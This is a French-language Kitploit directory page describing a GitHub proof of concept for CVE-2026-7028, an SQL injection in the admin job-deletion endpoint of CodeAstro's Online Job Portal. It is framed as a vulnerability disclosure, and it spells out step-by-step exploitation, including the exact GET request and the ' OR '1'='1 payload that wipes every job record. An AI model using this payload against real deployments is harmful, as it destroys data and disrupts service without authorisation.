Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/xmyronn/cve-2026-7028-sqli
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubxmyronn/cve-2026-7028-sqli

CVE-2026-7028-SQLI

Preuve de concept d'exploitation d'injection SQL dans CodeAstro Online Job Portal permettant la suppression authentifiée de tous les enregistrements d'offres d'emploi via une requête GET spécialement conçue.

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CodeAstro-Online-Job-Portal-SQLi-Delete-All

Détails

  • Fournisseur : CodeAstro
  • Produit : Projet de portail d'emploi en ligne en PHP MySQL
  • Version : 1.0
  • Type de vulnérabilité : Injection SQL
  • CWE : CWE-89
  • Point de terminaison concerné : /admin/jobs-admins/delete-jobs.php
  • Paramètre : id (GET)
  • Impact : Permet la suppression de tous les enregistrements d'emplois dans la base de données

Description

Une vulnérabilité d'injection SQL a été identifiée dans la fonctionnalité de suppression d'emplois de l'administrateur du portail d'emploi en ligne CodeAstro.

L'application utilise le paramètre id directement dans la requête SQL sans validation appropriée ni liaison de paramètres. De ce fait, un attaquant peut modifier la requête en injectant une entrée malveillante.

En exploitant ce problème, un utilisateur authentifié peut altérer la logique de requête prévue et supprimer tous les enregistrements d'emplois de la base de données au lieu d'une seule entrée.

Preuve de concept

Étape 1 : Se connecter en tant qu'administrateur

Connectez-vous au panneau d'administration.

Étape 2 : Accéder à la section des emplois

Allez à : /admin/jobs-admins/show-jobs.php Screenshot 2026-04-06 205206

Vérifiez que plusieurs entrées d'emplois existent.

Étape 3 : Exploiter la vulnérabilité

Envoyez la requête suivante :

GET /admin/jobs-admins/delete-jobs.php?id=48' OR '1'='1 HTTP/1.1
Host: target Screenshot 2026-04-06 205239

Étape 4 : Observer le résultat

Toutes les entrées d'emplois sont supprimées de la base de données au lieu d'une seule. Screenshot 2026-04-06 205252

Payload

' OR '1'='1

Impact

Un attaquant authentifié peut supprimer toutes les offres d'emploi du système, entraînant une perte totale de données et une interruption du service.

Référence

https://codeastro.com/online-job-portal-project-in-php-mysql-with-source-code/

Télécharger l’outil